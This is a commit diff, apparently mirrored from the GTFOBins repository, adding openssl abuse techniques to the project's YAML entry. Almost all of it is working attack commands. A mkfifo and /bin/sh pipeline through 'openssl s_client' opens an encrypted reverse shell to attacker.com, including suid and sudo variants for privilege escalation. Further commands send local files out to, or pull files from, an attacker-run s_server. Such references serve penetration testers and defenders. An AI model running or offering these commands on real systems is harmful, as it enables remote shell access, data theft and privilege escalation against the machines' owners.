mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2025-01-13 07:19:08 +01:00
Add reverse-shell, file-upload and file-download to openssl
This commit is contained in:
commit
aef9c84b02
@ -1,5 +1,43 @@
|
|||||||
---
|
---
|
||||||
functions:
|
functions:
|
||||||
|
reverse-shell:
|
||||||
|
- description: |
|
||||||
|
To receive the shell run the following on the attacker box:
|
||||||
|
|
||||||
|
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
|
||||||
|
openssl s_server -quiet -key key.pem -cert cert.pem -port 12345
|
||||||
|
|
||||||
|
Communication between attacker and target will be encrypted.
|
||||||
|
code: |
|
||||||
|
RHOST=attacker.com
|
||||||
|
RPORT=12345
|
||||||
|
mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -no_ign_eof -connect $RHOST:$RPORT > /tmp/s; rm /tmp/s
|
||||||
|
file-upload:
|
||||||
|
- description: |
|
||||||
|
To collect the file run the following on the attacker box:
|
||||||
|
|
||||||
|
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
|
||||||
|
openssl s_server -quiet -key key.pem -cert cert.pem -port 12345 > file_to_save
|
||||||
|
|
||||||
|
Send a file to a TCP port, transmission will be encrypted.
|
||||||
|
code: |
|
||||||
|
RHOST=attacker.com
|
||||||
|
RPORT=12345
|
||||||
|
LFILE=file_to_send
|
||||||
|
openssl s_client -quiet -no_ign_eof -connect $RHOST:$RPORT < "$LFILE"
|
||||||
|
file-download:
|
||||||
|
- description: |
|
||||||
|
To send the file run the following on the attacker box:
|
||||||
|
|
||||||
|
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
|
||||||
|
openssl s_server -quiet -key key.pem -cert cert.pem -port 12345 < file_to_send
|
||||||
|
|
||||||
|
Fetch a file from a TCP port, transmission will be encrypted.
|
||||||
|
code: |
|
||||||
|
RHOST=attacker.com
|
||||||
|
RPORT=12345
|
||||||
|
LFILE=file_to_save
|
||||||
|
openssl s_client -quiet -connect $RHOST:$RPORT > "$LFILE"
|
||||||
file-write:
|
file-write:
|
||||||
- code: |
|
- code: |
|
||||||
LFILE=file_to_write
|
LFILE=file_to_write
|
||||||
@ -14,11 +52,31 @@ functions:
|
|||||||
LFILE=file_to_read
|
LFILE=file_to_read
|
||||||
openssl enc -in "$LFILE"
|
openssl enc -in "$LFILE"
|
||||||
suid:
|
suid:
|
||||||
|
- description: |
|
||||||
|
To receive the shell run the following on the attacker box:
|
||||||
|
|
||||||
|
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
|
||||||
|
openssl s_server -quiet -key key.pem -cert cert.pem -port 12345
|
||||||
|
|
||||||
|
Communication between attacker and target will be encrypted.
|
||||||
|
code: |
|
||||||
|
RHOST=attacker.com
|
||||||
|
RPORT=12345
|
||||||
|
mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | ./openssl s_client -quiet -no_ign_eof -connect $RHOST:$RPORT > /tmp/s; rm /tmp/s
|
||||||
|
|
||||||
- code: |
|
- code: |
|
||||||
LFILE=file_to_write
|
LFILE=file_to_write
|
||||||
echo DATA | openssl enc -out "$LFILE"
|
echo DATA | openssl enc -out "$LFILE"
|
||||||
sudo:
|
sudo:
|
||||||
- code: |
|
- description: |
|
||||||
LFILE=file_to_write
|
To receive the shell run the following on the attacker box:
|
||||||
echo DATA | sudo openssl enc -out "$LFILE"
|
|
||||||
|
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
|
||||||
|
openssl s_server -quiet -key key.pem -cert cert.pem -port 12345
|
||||||
|
|
||||||
|
Communication between attacker and target will be encrypted.
|
||||||
|
code: |
|
||||||
|
RHOST=attacker.com
|
||||||
|
RPORT=12345
|
||||||
|
mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | sudo openssl s_client -quiet -no_ign_eof -connect $RHOST:$RPORT > /tmp/s; rm /tmp/s
|
||||||
---
|
---
|
||||||
|
Loading…
Reference in New Issue
Block a user